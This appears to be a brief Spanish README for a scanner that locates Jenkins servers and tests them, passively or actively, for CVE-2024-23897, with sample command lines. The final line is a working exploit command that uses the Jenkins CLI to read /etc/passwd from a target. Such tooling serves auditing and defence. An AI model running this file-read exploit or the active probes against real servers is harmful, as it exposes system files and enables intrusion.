
Encuentra entornos de Jenkins y comprueba la presencia de CVE-2024-23897
Encuentra entornos Jenkins y comprueba el CVE-2024-23897
Prueba las rutas: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
Identifica vía:
Pasiva (por defecto): compara la versión detectada con los umbrales:
Activa (--active): envía el handshake del protocolo binario del Jenkins CLI sobre HTTP. Si el servidor responde 200 + Content-Type: application/octet-stream, confirma que el canal CLI está abierto y el exploit es aplicable.
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"